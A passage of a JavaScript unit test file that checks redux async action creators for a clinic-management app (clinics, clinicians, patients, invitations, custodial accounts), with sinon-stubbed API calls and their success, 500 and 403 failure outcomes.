'UPDATE_CLINIC_REQUEST' }, { type: 'UPDATE_CLINIC_SUCCESS', payload: { clinicId: '5f85fbe6686e6bb9170ab5d0', clinic: { name: 'newName' } } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.updateClinic(api, '5f85fbe6686e6bb9170ab5d0', { name: 'newName' })); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.update.callCount).to.equal(1); }); it('should trigger UPDATE_CLINIC_FAILURE and it should call error once for a failed request', () => { let api = { clinics: { update: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_UPDATING_CLINIC); err.status = 500; let expectedActions = [ { type: 'UPDATE_CLINIC_REQUEST' }, { type: 'UPDATE_CLINIC_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.updateClinic(api, '5f85fbe6686e6bb9170ab5d0', {name: 'newName'})); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_UPDATING_CLINIC }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.update.callCount).to.equal(1); }); }); describe('fetchCliniciansFromClinic', () => { it('should trigger FETCH_CLINICIANS_FROM_CLINIC_SUCCESS and it should call clinics.inviteClinician once for a successful request', () => { let clinicians = [{ clinicId: '5f85fbe6686e6bb9170ab5d0', clinicianId: 'clinician_id', permissions: ['CLINIC_ADMIN'], }, { clinicId: '5f85fbe6686e6bb9170ab5d0', clinicianId: 'clinician_id2', permissions: ['CLINIC_ADMIN'], }, ]; let clinicId = '5f85fbe6686e6bb9170ab5d0'; let api = { clinics: { getCliniciansFromClinic: sinon.stub().callsArgWith(2, null, clinicians), }, }; let expectedActions = [ { type: 'FETCH_CLINICIANS_FROM_CLINIC_REQUEST' }, { type: 'FETCH_CLINICIANS_FROM_CLINIC_SUCCESS', payload: { results: { clinicId, clinicians } } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchCliniciansFromClinic(api, clinicId)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.getCliniciansFromClinic.callCount).to.equal(1); }); it('should trigger FETCH_CLINICIANS_FROM_CLINIC_FAILURE and it should call error once for a failed request', () => { let clinicId = '5f85fbe6686e6bb9170ab5d0'; let api = { clinics: { getCliniciansFromClinic: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_FETCHING_CLINICIANS_FROM_CLINIC); err.status = 500; let expectedActions = [ { type: 'FETCH_CLINICIANS_FROM_CLINIC_REQUEST' }, { type: 'FETCH_CLINICIANS_FROM_CLINIC_FAILURE', error: err, meta: { apiError: { status: 500, body: 'Error!' } }, payload: { clinicId: clinicId }, }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchCliniciansFromClinic(api, clinicId)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_CLINICIANS_FROM_CLINIC }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.getCliniciansFromClinic.callCount).to.equal(1); }); it('[403] should trigger FETCH_CLINICIANS_FROM_CLINIC_FAILURE and it should call error once for a failed request', () => { let clinicId = '5f85fbe6686e6bb9170ab5d0'; let api = { clinics: { getCliniciansFromClinic: sinon.stub() .callsArgWith(2, { status: 403, body: 'Error!' }, null), }, }; let err = new Error( ErrorMessages.ERR_FETCHING_CLINICIANS_FROM_CLINIC_UNAUTHORIZED ); err.status = 403; let expectedActions = [ { type: 'FETCH_CLINICIANS_FROM_CLINIC_REQUEST' }, { type: 'FETCH_CLINICIANS_FROM_CLINIC_FAILURE', error: err, meta: { apiError: { status: 403, body: 'Error!' } }, payload: { clinicId: clinicId }, }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchCliniciansFromClinic(api, clinicId)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_CLINICIANS_FROM_CLINIC_UNAUTHORIZED, }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.getCliniciansFromClinic.callCount).to.equal(1); }); }); describe('fetchClinician', () => { it('should trigger FETCH_CLINICIAN_SUCCESS and it should call clinics.getClinician once for a successful request', () => { let clinician = { clinicId: '5f85fbe6686e6bb9170ab5d0', clinicianId: 'clinician_id', permissions: ['CLINIC_ADMIN'], }; let api = { clinics: { getClinician: sinon.stub().callsArgWith(2, null, clinician), }, }; let expectedActions = [ { type: 'FETCH_CLINICIAN_REQUEST' }, { type: 'FETCH_CLINICIAN_SUCCESS', payload: { clinicId: '5f85fbe6686e6bb9170ab5d0', clinician: clinician } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchClinician(api, '5f85fbe6686e6bb9170ab5d0', 'clinician_id')); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.getClinician.callCount).to.equal(1); }); it('should trigger FETCH_CLINICIAN_FAILURE and it should call error once for a failed request', () => { let api = { clinics: { getClinician: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_FETCHING_CLINICIAN); err.status = 500; let expectedActions = [ { type: 'FETCH_CLINICIAN_REQUEST' }, { type: 'FETCH_CLINICIAN_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchClinician(api, '5f85fbe6686e6bb9170ab5d0', 'clinician_id')); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_CLINICIAN }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.getClinician.callCount).to.equal(1); }); }); describe('updateClinician', () => { it('should trigger UPDATE_CLINICIAN_SUCCESS and it should call clinics.updateClinician once for a successful request', () => { let clinicId = '5f85fbe6686e6bb9170ab5d0'; let clinicianId = 'clinician_id'; let updates = { id: 'clinician_id', email: '<EMAIL>', name: '<NAME>', roles: ['CLINIC_ADMIN', 'PRESCRIBER'], }; let api = { clinics: { updateClinician: sinon.stub().callsArgWith(3, null, {clinicId, clinicianId, updates}), }, }; let expectedActions = [ { type: 'UPDATE_CLINICIAN_REQUEST' }, { type: 'UPDATE_CLINICIAN_SUCCESS', payload: { clinicId, clinicianId, clinician: updates, } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.updateClinician(api, clinicId, clinicianId, updates)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.updateClinician.callCount).to.equal(1); }); it('should trigger UPDATE_CLINICIAN_FAILURE and it should call error once for a failed request', () => { let api = { clinics: { updateClinician: sinon.stub().callsArgWith(3, {status: 500, body: 'Error!'}, null), }, }; let updates = { permissions: ['PRESCRIBER'] }; let err = new Error(ErrorMessages.ERR_UPDATING_CLINICIAN); err.status = 500; let expectedActions = [ { type: 'UPDATE_CLINICIAN_REQUEST' }, { type: 'UPDATE_CLINICIAN_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.updateClinician(api, '5f85fbe6686e6bb9170ab5d0', 'clinician_id', updates)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_UPDATING_CLINICIAN }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.updateClinician.callCount).to.equal(1); }); it('[403] should trigger UPDATE_CLINICIAN_FAILURE and it should call error once for a failed request', () => { let api = { clinics: { updateClinician: sinon.stub() .callsArgWith(3, { status: 403, body: 'Error!' }, null), }, }; let updates = { permissions: ['PRESCRIBER'], }; let err = new Error(ErrorMessages.ERR_UPDATING_CLINICIAN_UNAUTHORIZED); err.status = 403; let expectedActions = [ { type: 'UPDATE_CLINICIAN_REQUEST' }, { type: 'UPDATE_CLINICIAN_FAILURE', error: err, meta: { apiError: { status: 403, body: 'Error!' } }, }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch( async.updateClinician( api, '5f85fbe6686e6bb9170ab5d0', 'clinician_id', updates ) ); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_UPDATING_CLINICIAN_UNAUTHORIZED, }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.updateClinician.callCount).to.equal(1); }); }); describe('deleteClinicianFromClinic', () => { it('should trigger DELETE_CLINICIAN_FROM_CLINIC_SUCCESS and it should call clinics.deleteClinicianFromClinic once for a successful request', () => { let api = { clinics: { deleteClinicianFromClinic: sinon.stub().callsArgWith(2, null, {}), }, }; let expectedActions = [ { type: 'DELETE_CLINICIAN_FROM_CLINIC_REQUEST' }, { type: 'DELETE_CLINICIAN_FROM_CLINIC_SUCCESS', payload: { clinicId: '5f85fbe6686e6bb9170ab5d0', clinicianId: 'clinician_id', } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.deleteClinicianFromClinic(api, '5f85fbe6686e6bb9170ab5d0', 'clinician_id')); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.deleteClinicianFromClinic.callCount).to.equal(1); }); it('should trigger DELETE_CLINICIAN_FROM_CLINIC_FAILURE and it should call error once for a failed request', () => { let api = { clinics: { deleteClinicianFromClinic: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_DELETING_CLINICIAN_FROM_CLINIC); err.status = 500; let expectedActions = [ { type: 'DELETE_CLINICIAN_FROM_CLINIC_REQUEST' }, { type: 'DELETE_CLINICIAN_FROM_CLINIC_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.deleteClinicianFromClinic(api, '5f85fbe6686e6bb9170ab5d0', 'clinician_id')); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_DELETING_CLINICIAN_FROM_CLINIC }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.deleteClinicianFromClinic.callCount).to.equal(1); }); it('[403] should trigger DELETE_CLINICIAN_FROM_CLINIC_FAILURE and it should call error once for a failed request', () => { let api = { clinics: { deleteClinicianFromClinic: sinon.stub() .callsArgWith(2, { status: 403, body: 'Error!' }, null), }, }; let err = new Error( ErrorMessages.ERR_DELETING_CLINICIAN_FROM_CLINIC_UNAUTHORIZED ); err.status = 403; let expectedActions = [ { type: 'DELETE_CLINICIAN_FROM_CLINIC_REQUEST' }, { type: 'DELETE_CLINICIAN_FROM_CLINIC_FAILURE', error: err, meta: { apiError: { status: 403, body: 'Error!' } }, }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch( async.deleteClinicianFromClinic( api, '5f85fbe6686e6bb9170ab5d0', 'clinician_id' ) ); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_DELETING_CLINICIAN_FROM_CLINIC_UNAUTHORIZED, }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.deleteClinicianFromClinic.callCount).to.equal(1); }); }); describe('deletePatientFromClinic', () => { it('should trigger DELETE_PATIENT_FROM_CLINIC_SUCCESS and it should call clinics.deletePatientFromClinic once for a successful request', () => { let api = { clinics: { deletePatientFromClinic: sinon.stub().callsArgWith(2, null, { foo: 'bar '}), }, }; let expectedActions = [ { type: 'DELETE_PATIENT_FROM_CLINIC_REQUEST' }, { type: 'DELETE_PATIENT_FROM_CLINIC_SUCCESS', payload: { clinicId: '5f85fbe6686e6bb9170ab5d0', patientId: 'patient_id', } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); const callback = sinon.stub(); let store = mockStore({ blip: initialState }); store.dispatch(async.deletePatientFromClinic(api, '5f85fbe6686e6bb9170ab5d0', 'patient_id', callback)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.deletePatientFromClinic.callCount).to.equal(1); // assert callback contains no error sinon.assert.calledOnce(callback); sinon.assert.calledWithExactly(callback, null); }); it('should trigger DELETE_PATIENT_FROM_CLINIC_FAILURE and it should call error once for a failed request', () => { const error = {status: 500, body: 'Error!'}; let api = { clinics: { deletePatientFromClinic: sinon.stub().callsArgWith(2, error, null), }, }; let err = new Error(ErrorMessages.ERR_DELETING_PATIENT_FROM_CLINIC); err.status = 500; let expectedActions = [ { type: 'DELETE_PATIENT_FROM_CLINIC_REQUEST' }, { type: 'DELETE_PATIENT_FROM_CLINIC_FAILURE', error: err, meta: { apiError: error } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); const callback = sinon.stub(); let store = mockStore({ blip: initialState }); store.dispatch(async.deletePatientFromClinic(api, '5f85fbe6686e6bb9170ab5d0', 'patient_id', callback)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_DELETING_PATIENT_FROM_CLINIC }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.deletePatientFromClinic.callCount).to.equal(1); // assert callback contains the error sinon.assert.calledOnce(callback); sinon.assert.calledWithExactly(callback, error); }); it('[403] should trigger DELETE_PATIENT_FROM_CLINIC_FAILURE and it should call error once for a failed request', () => { const error = { status: 403, body: 'Error!' }; let api = { clinics: { deletePatientFromClinic: sinon.stub().callsArgWith(2, error, null), }, }; let err = new Error( ErrorMessages.ERR_DELETING_CLINICIAN_FROM_CLINIC_UNAUTHORIZED ); err.status = 403; let expectedActions = [ { type: 'DELETE_PATIENT_FROM_CLINIC_REQUEST' }, { type: 'DELETE_PATIENT_FROM_CLINIC_FAILURE', error: err, meta: { apiError: error }, }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); const callback = sinon.stub(); let store = mockStore({ blip: initialState }); store.dispatch( async.deletePatientFromClinic( api, '5f85fbe6686e6bb9170ab5d0', 'patient_id', callback ) ); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_DELETING_CLINICIAN_FROM_CLINIC_UNAUTHORIZED, }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.deletePatientFromClinic.callCount).to.equal(1); // assert callback contains the error sinon.assert.calledOnce(callback); sinon.assert.calledWithExactly(callback, error); }); }); describe('deletePatientInvitation', () => { it('should trigger DELETE_PATIENT_INVITATION_SUCCESS and it should call clinics.deletePatientInvitation once for a successful request', () => { let api = { clinics: { deletePatientInvitation: sinon.stub().callsArgWith(2, null, { foo: 'bar '}), }, }; let expectedActions = [ { type: 'DELETE_PATIENT_INVITATION_REQUEST' }, { type: 'DELETE_PATIENT_INVITATION_SUCCESS', payload: { inviteId: 'invite_id', clinicId: '5f85fbe6686e6bb9170ab5d0', } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); const callback = sinon.stub(); let store = mockStore({ blip: initialState }); store.dispatch(async.deletePatientInvitation(api, '5f85fbe6686e6bb9170ab5d0', 'invite_id', callback)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.deletePatientInvitation.callCount).to.equal(1); }); it('should trigger DELETE_PATIENT_INVITATION_FAILURE and it should call error once for a failed request', () => { const error = {status: 500, body: 'Error!'}; let api = { clinics: { deletePatientInvitation: sinon.stub().callsArgWith(2, error, null), }, }; let err = new Error(ErrorMessages.ERR_DELETING_PATIENT_INVITATION); err.status = 500; let expectedActions = [ { type: 'DELETE_PATIENT_INVITATION_REQUEST' }, { type: 'DELETE_PATIENT_INVITATION_FAILURE', error: err, meta: { apiError: error } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); const callback = sinon.stub(); let store = mockStore({ blip: initialState }); store.dispatch(async.deletePatientInvitation(api, '5f85fbe6686e6bb9170ab5d0', 'invite_id', callback)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_DELETING_PATIENT_INVITATION }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.deletePatientInvitation.callCount).to.equal(1); }); }); describe('fetchClinicByShareCode', () => { it('should trigger FETCH_CLINIC_SUCCESS and it should call clinics.getClinicByShareCode once for a successful request', () => { let clinic = { id: '5f85fbe6686e6bb9170ab5d0', address: '1 Address Ln, City Zip', name: 'Clinic1', phoneNumbers: [{ number: '(888) 555-5555', type: 'Office' }], }; let api = { clinics: { getClinicByShareCode: sinon.stub().callsArgWith(1, null, clinic), }, }; let expectedActions = [ { type: 'FETCH_CLINIC_REQUEST' }, { type: 'FETCH_CLINIC_SUCCESS', payload: { clinic, } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchClinicByShareCode(api, 'ABCD-EVGR-3393-J48I')); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.getClinicByShareCode.callCount).to.equal(1); }); it('should trigger FETCH_CLINIC_FAILURE and it should call error once for a failed request', () => { const error = {status: 500, body: 'Error!'}; let api = { clinics: { getClinicByShareCode: sinon.stub().callsArgWith(1, error, null), }, }; let err = new Error(ErrorMessages.ERR_FETCHING_CLINIC); err.status = 500; let expectedActions = [ { type: 'FETCH_CLINIC_REQUEST' }, { type: 'FETCH_CLINIC_FAILURE', error: err, meta: { apiError: error } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchClinicByShareCode(api, 'ABCD-EVGR-3393-J48I')); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_CLINIC }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.getClinicByShareCode.callCount).to.equal(1); }); }); describe('fetchPatientsForClinic', () => { it('should trigger FETCH_PATIENTS_FOR_CLINIC_SUCCESS and it should call clinics.getPatientsForClinic once for a successful request', () => { let patients = [{ clinicId: '5f85fbe6686e6bb9170ab5d0', patientId: 'patient_id', id: 'relationship_id', }]; let api = { clinics: { getPatientsForClinic: sinon.stub().callsArgWith(2, null, { data: patients, meta: { count: 1 }, }), }, }; let expectedActions = [ { type: 'FETCH_PATIENTS_FOR_CLINIC_REQUEST' }, { type: 'FETCH_PATIENTS_FOR_CLINIC_SUCCESS', payload: { clinicId: '5f85fbe6686e6bb9170ab5d0', count: 1, patients } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchPatientsForClinic(api, '5f85fbe6686e6bb9170ab5d0')); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.getPatientsForClinic.callCount).to.equal(1); }); it('should trigger FETCH_PATIENTS_FOR_CLINIC_FAILURE and it should call error once for a failed request', () => { let api = { clinics: { getPatientsForClinic: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_FETCHING_PATIENTS_FOR_CLINIC); err.status = 500; let expectedActions = [ { type: 'FETCH_PATIENTS_FOR_CLINIC_REQUEST' }, { type: 'FETCH_PATIENTS_FOR_CLINIC_FAILURE', error: err, meta: { apiError: { status: 500, body: 'Error!' } }, payload: { clinicId: '5f85fbe6686e6bb9170ab5d0' }, }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchPatientsForClinic(api, '5f85fbe6686e6bb9170ab5d0')); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_PATIENTS_FOR_CLINIC }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.getPatientsForClinic.callCount).to.equal(1); }); it('[403] should trigger FETCH_PATIENTS_FOR_CLINIC_FAILURE and it should call error once for a failed request', () => { let api = { clinics: { getPatientsForClinic: sinon.stub() .callsArgWith(2, { status: 403, body: 'Error!' }, null), }, }; let err = new Error( ErrorMessages.ERR_FETCHING_PATIENTS_FOR_CLINIC_UNAUTHORIZED ); err.status = 403; let expectedActions = [ { type: 'FETCH_PATIENTS_FOR_CLINIC_REQUEST' }, { type: 'FETCH_PATIENTS_FOR_CLINIC_FAILURE', error: err, meta: { apiError: { status: 403, body: 'Error!' } }, payload: { clinicId: '5f85fbe6686e6bb9170ab5d0' }, }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch( async.fetchPatientsForClinic(api, '5f85fbe6686e6bb9170ab5d0') ); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_PATIENTS_FOR_CLINIC_UNAUTHORIZED, }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.getPatientsForClinic.callCount).to.equal(1); }); }); describe('fetchPatientFromClinic', () => { it('should trigger FETCH_PATIENT_FROM_CLINIC_SUCCESS and it should call clinics.getPatientFromClinic once for a successful request', () => { let patientUserId = 'patient_userId'; let clinicId = '5f85fbe6686e6bb9170ab5d0'; let patientId = 'patient_clinic_relationship_id'; let patient = { id: patientId, patientId: patientUserId, } let api = { clinics: { getPatientFromClinic: sinon.stub().callsArgWith(2, null, patient), }, }; let expectedActions = [ { type: 'FETCH_PATIENT_FROM_CLINIC_REQUEST' }, { type: 'FETCH_PATIENT_FROM_CLINIC_SUCCESS', payload: { patient, clinicId, } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchPatientFromClinic(api, clinicId, patientUserId)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.getPatientFromClinic.callCount).to.equal(1); }); it('should trigger FETCH_PATIENT_FROM_CLINIC_FAILURE and it should call error once for a failed request', () => { let patientUserId = 'patient_userId'; let clinicId = '5f85fbe6686e6bb9170ab5d0'; let api = { clinics: { getPatientFromClinic: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_FETCHING_PATIENT_FROM_CLINIC); err.status = 500; let expectedActions = [ { type: 'FETCH_PATIENT_FROM_CLINIC_REQUEST' }, { type: 'FETCH_PATIENT_FROM_CLINIC_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchPatientFromClinic(api, clinicId, patientUserId)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_PATIENT_FROM_CLINIC }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.getPatientFromClinic.callCount).to.equal(1); }); }); describe('createClinicCustodialAccount', () => { it('should trigger CREATE_CLINIC_CUSTODIAL_ACCOUNT_SUCCESS and it should call clinics.createClinicCustodialAccount once for a successful request', () => { let clinicId = '5f85fbe6686e6bb9170ab5d0'; let patient = { fullName: 'patientName', email: 'patient<PASSWORD>', id: 'patient123', }; let api = { clinics: { createClinicCustodialAccount: sinon.stub().callsArgWith(2, null, patient), }, }; let expectedActions = [ { type: 'CREATE_CLINIC_CUSTODIAL_ACCOUNT_REQUEST' }, { type: 'CREATE_CLINIC_CUSTODIAL_ACCOUNT_SUCCESS', payload: { clinicId, patientId: 'patient123', patient, } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.createClinicCustodialAccount(api, clinicId, patient)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.createClinicCustodialAccount.callCount).to.equal(1); }); it('should trigger CREATE_CLINIC_CUSTODIAL_ACCOUNT_FAILURE and it should call error once for a failed request', () => { let clinicId = '5f85fbe6686e6bb9170ab5d0'; let patient = { fullName: 'patientName', email: 'patientemail' }; let api = { clinics: { createClinicCustodialAccount: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_CREATING_CUSTODIAL_ACCOUNT); err.status = 500; let expectedActions = [ { type: 'CREATE_CLINIC_CUSTODIAL_ACCOUNT_REQUEST' }, { type: 'CREATE_CLINIC_CUSTODIAL_ACCOUNT_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.createClinicCustodialAccount(api, clinicId, patient)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_CREATING_CUSTODIAL_ACCOUNT }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.createClinicCustodialAccount.callCount).to.equal(1); }); it('[403] should trigger CREATE_CLINIC_CUSTODIAL_ACCOUNT_FAILURE and it should call error once for a failed request', () => { let clinicId = '5f85fbe6686e6bb9170ab5d0'; let patient = { fullName: 'patientName', email: 'patientemail', }; let api = { clinics: { createClinicCustodialAccount: sinon.stub() .callsArgWith(2, { status: 403, body: 'Error!' }, null), }, }; let err = new Error( ErrorMessages.ERR_CREATING_CUSTODIAL_ACCOUNT_UNAUTHORIZED ); err.status = 403; let expectedActions = [ { type: 'CREATE_CLINIC_CUSTODIAL_ACCOUNT_REQUEST' }, { type: 'CREATE_CLINIC_CUSTODIAL_ACCOUNT_FAILURE', error: err, meta: { apiError: { status: 403, body: 'Error!' } }, }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch( async.createClinicCustodialAccount(api, clinicId, patient) ); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_CREATING_CUSTODIAL_ACCOUNT_UNAUTHORIZED, }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.createClinicCustodialAccount.callCount).to.equal(1); }); }); describe('createVCACustodialAccount', () => { it('should trigger CREATE_VCA_CUSTODIAL_ACCOUNT_SUCCESS and it should call user.createCustodialAccount once for a successful request', () => { let patient = { fullName: 'patientName', email: 'patientemail', userid: 'patient123', }; let api = { user: { createCustodialAccount: sinon.stub().callsArgWith(1, null, patient), }, }; let expectedActions = [ { type: 'CREATE_VCA_CUSTODIAL_ACCOUNT_REQUEST' }, { type: 'CREATE_VCA_CUSTODIAL_ACCOUNT_SUCCESS', payload: { patientId: 'patient123', patient, } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.createVCACustodialAccount(api, patient)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.createCustodialAccount.callCount).to.equal(1); }); it('should trigger CREATE_VCA_CUSTODIAL_ACCOUNT_FAILURE and it should call error once for a failed request', () => { let patient = { fullName: 'patientName', email: 'patientemail' }; let api = { user: { createCustodialAccount: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_CREATING_CUSTODIAL_ACCOUNT); err.status = 500; let expectedActions = [ { type: 'CREATE_VCA_CUSTODIAL_ACCOUNT_REQUEST' }, { type: 'CREATE_VCA_CUSTODIAL_ACCOUNT_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.createVCACustodialAccount(api, patient)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_CREATING_CUSTODIAL_ACCOUNT }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.user.createCustodialAccount.callCount).to.equal(1); }); }); describe('updateClinicPatient', () => { it('should trigger UPDATE_CLINIC_PATIENT_SUCCESS and it should call clinics.updateClinicPatient once for a successful request', () => { let patientUserId = 'patient_userId'; let clinicId = '5f85fbe6686e6bb9170ab5d0'; let patient = { id: patientUserId, fullName: 'patientName', email: 'patientemail' }; let api = { clinics: { updateClinicPatient: sinon.stub().callsArgWith(3, null, patient), }, }; let expectedActions = [ { type: 'UPDATE_CLINIC_PATIENT_REQUEST' }, { type: 'UPDATE_CLINIC_PATIENT_SUCCESS', payload: { clinicId, patientId: patientUserId, patient } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.updateClinicPatient(api, clinicId, patientUserId, patient)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.updateClinicPatient.callCount).to.equal(1); }); it('should trigger UPDATE_CLINIC_PATIENT_FAILURE and it should call error once for a failed request', () => { let patientUserId = 'patient_userId'; let clinicId = '5f85fbe6686e6bb9170ab5d0'; let patient = { id: patientUserId, fullName: 'patientName', 